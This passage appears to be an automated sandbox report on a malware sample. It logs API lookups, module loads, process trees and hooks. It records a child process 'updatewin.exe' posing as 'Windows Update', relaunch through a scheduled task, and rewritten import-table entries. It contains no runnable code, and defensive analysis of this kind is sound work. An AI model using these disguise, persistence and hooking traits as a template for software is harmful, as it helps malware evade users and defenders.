Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x7491c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
System (256)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-19 06:57:38 (UTC) True 1
Fn
Get Time type = Ticks, time = 115378 True 1
Fn
Get Time type = Performance Ctr, time = 17341314440 True 1
Fn
Get Time type = Ticks, time = 115425 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = System Time, time = 2019-07-19 06:57:39 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 17371613493 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Process #10: updatewin.exe
711 0
»
Information Value
ID #10
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:54, Reason: Child Process
Unmonitor End Time: 00:01:05, Reason: Self Terminated
Monitor Duration 00:00:10
OS Process Information
»
Information Value
PID 0xa5c
Parent PID 0x9a4 (c:\users\5p5nrgjn0js halpmcxz\desktop\ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A60
0x A64
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
updatewin.exe 0x00400000 0x0044DFFF Relevant Image - 32-bit - False False
buffer 0x00305000 0x00305FFF Marked Executable - 32-bit - False False
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x00000000002f0000:+0x16785 90. entry of updatewin.exe 4 bytes kernel32.dll:QueryPerformanceCounter+0x0 now points to pagefile_0x00000000007e0000:+0x820000
IAT private_0x00000000002f0000:+0x16785 121. entry of updatewin.exe 4 bytes user32.dll:CallMsgFilterW+0x0 now points to pagefile_0x00000000007e0000:+0x820000
Host Behavior
File (6)
»
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Module (169)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load GDI32.dll base_address = 0x75ad0000 True 1
Fn
Load COMCTL32.dll base_address = 0x74760000 True 1
Fn
Load WINMM.dll base_address = 0x74a30000 True 1
Fn
Load msvcr100.dll base_address = 0x74900000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 8
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetDesktopWindow, address_out = 0x74f60a19 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = InvalidateRect, address_out = 0x74f61381 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfW, address_out = 0x74f7e061 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DrawIcon, address_out = 0x74f68deb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = FillRect, address_out = 0x74f60eb6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetDlgItem, address_out = 0x74f7f1ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x74f61341 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x74f61361 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DialogBoxParamW, address_out = 0x74f7cfca True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MoveWindow, address_out = 0x74f63698 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetClientRect, address_out = 0x74f60c62 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateDialogParamW, address_out = 0x74f810dc True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowPos, address_out = 0x74f58e4e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateAcceleratorW, address_out = 0x74f61246 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadAcceleratorsW, address_out = 0x74f64dd6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadStringW, address_out = 0x74f58eb9 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadIconW, address_out = 0x74f5b142 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMonitorInfoW, address_out = 0x74f63000 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromWindow, address_out = 0x74f63150 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = TextOutW, address_out = 0x75aed41c True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetBkMode, address_out = 0x75ae51a2 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SelectObject, address_out = 0x75ae4f70 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateFontW, address_out = 0x75aeb600 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = DeleteObject, address_out = 0x75ae5689 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateSolidBrush, address_out = 0x75ae4f17 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetTextAlign, address_out = 0x75ae8401 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll function = InitCommonControlsEx, address_out = 0x747809ce True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x74a326e0 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x7491c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create Windows Update class_name = WINDOWSUPDATE, wndproc_parameter = 0 True 1
Fn
System (263)
»
Operation Additional Information Success Count Logfile
Sleep duration = 1000 milliseconds (1.000 seconds) True 7
Fn
Get Time type = System Time, time = 2019-07-19 06:57:40 (UTC) True 2
Fn
Get Time type = Ticks, time = 116657 True 1
Fn
Get Time type = Performance Ctr, time = 17492789928 True 1
Fn
Get Time type = Ticks, time = 116688 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = Performance Ctr, time = 17530736623 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Process #11: taskeng.exe
0 0
»
Information Value
ID #11
File Name c:\windows\system32\taskeng.exe
Command Line taskeng.exe {FB1509EA-5700-4FAF-8375-2764FDDD9411} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:59, Reason: Created Scheduled Job
Unmonitor End Time: 00:01:05, Reason: Self Terminated
Monitor Duration 00:00:05
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xaa4
Parent PID 0x36c (Unknown)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x AA8
0x AAC
0x AB0
0x AB4
0x AB8
0x ABC
0x AC0
Process #12: ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe
0 0
»
Information Value
ID #12
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\c5878955-7c21-46f7-9950-dbc1d2273e6e\ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c5878955-7c21-46f7-9950-dbc1d2273e6e\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe" --Task
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:00, Reason: Child Process
Unmonitor End Time: 00:01:05, Reason: Self Terminated
Monitor Duration 00:00:05
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xac4
Parent PID 0xaa4 (c:\windows\system32\taskeng.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B0C
0x AC8
Process #16: ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe
3398 4
»
Information Value
ID #16
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\c5878955-7c21-46f7-9950-dbc1d2273e6e\ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c5878955-7c21-46f7-9950-dbc1d2273e6e\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe" --AutoStart
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:28, Reason: Autostart
Unmonitor End Time: 00:04:26, Reason: Terminated by Timeout
Monitor Duration 00:02:57
OS Process Information
»
Information Value
PID 0x564
Parent PID 0x3ac (Unknown)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 568
0x 6EC
0x 6F0
0x 6F4
0x 6F8
0x 6FC
0x 700
0x 640
0x 628
0x 5EC
0x 5E8
0x 63C
0x 5CC
0x 2B8
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000000d10000:+0x5d3e7 1. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes advapi32.dll:SetPrivateObjectSecurity+0x0 now points to private_0x000000007fff0000:+0x47c13324
IAT private_0x0000000000d10000:+0x5d3e7 2. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes advapi32.dll:PrivilegedServiceAuditAlarmA+0x0 now points to private_0x0000000000050000:+0x21446
IAT private_0x0000000000d10000:+0x5d3e7 3. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes advapi32.dll:LockServiceDatabase+0x0 now points to private_0x000000007fff0000:+0x7f6b0000
IAT private_0x0000000000d10000:+0x5d3e7 7. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes gdi32.dll:SetMapMode+0x0 now points to pagefile_0x0000000001290000:+0xbf0689
IAT private_0x0000000000d10000:+0x5d3e7 8. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes gdi32.dll:GetOutlineTextMetricsA+0x0 now points to private_0x000000007fff0000:+0xb00ffad
IAT private_0x0000000000d10000:+0x5d3e7 12. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:FormatMessageW+0x0 now points to private_0x000000007fff0000:+0x3097589
IAT private_0x0000000000d10000:+0x5d3e7 13. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:CreateMailslotA+0x0 now points to private_0x000000007fff0000:+0x3eec1cc7
IAT private_0x0000000000d10000:+0x5d3e7 14. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:lstrlenA+0x0 now points to private_0x000000007fff0000:+0xbed758b
IAT private_0x0000000000d10000:+0x5d3e7 15. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetCurrentDirectoryA+0x0 now points to private_0x000000007fff0000:+0x773c087d
IAT private_0x0000000000d10000:+0x5d3e7 16. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:CreateFileW+0x0 now points to private_0x000000007fff0000:+0x7f8c0f74
IAT private_0x0000000000d10000:+0x5d3e7 17. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetNumberFormatW+0x0 now points to private_0x000000007fff0000:+0x7ccbe856
IAT private_0x0000000000d10000:+0x5d3e7 18. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:PeekConsoleInputW+0x0 now points to private_0x000000007fff0000:+0x4684ffff
IAT private_0x0000000000d10000:+0x5d3e7 27. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetACP+0x0 now points to private_0x000000007fff0000:+0x4ccdccc3
IAT private_0x0000000000d10000:+0x5d3e7 28. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:IsValidCodePage+0x0 now points to private_0x000000007fff0000:+0x4ccdcccc
IAT private_0x0000000000d10000:+0x5d3e7 29. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetHandleInformation+0x0 now points to private_0x000000007fff0000:+0x3f38b56
IAT private_0x0000000000d10000:+0x5d3e7 31. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:LockFile+0x0 now points to private_0x000000007fff0000:+0x6837ff0a
IAT private_0x0000000000d10000:+0x5d3e7 33. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:ExitProcess+0x0 now points to private_0x000000007fff0000:+0x4705c483
IAT private_0x0000000000d10000:+0x5d3e7 34. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:VirtualProtect+0x0 now points to private_0x0000000000050000:+0x21446
IAT private_0x0000000000d10000:+0x5d3e7 35. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetBinaryTypeA+0x0 now points to private_0x000000007fff0000:+0x40340000
IAT private_0x0000000000d10000:+0x5d3e7 36. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GlobalMemoryStatus+0x0 now points to private_0x0000000000090000:+0x746c7
IAT private_0x0000000000d10000:+0x5d3e7 38. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:OutputDebugStringW+0x0 now points to private_0x000000007fff0000:+0x435f0689
IAT private_0x0000000000d10000:+0x5d3e7 39. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetProcAddress+0x0 now points to private_0x000000007fff0000:+0x4ccdcccc
IAT private_0x0000000000d10000:+0x5d3e7 40. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:LoadLibraryExW+0x0 now points to private_0x000000007fff0000:+0x4ccdcccc
IAT private_0x0000000000d10000:+0x5d3e7 41. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes ntdll.dll:RtlEncodePointer+0x0 now points to private_0x000000007fff0000:+0xbed8b55
IAT private_0x0000000000d10000:+0x5d3e7 43. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:RaiseException+0x0 now points to private_0x000000007fff0000:+0x78d2012b
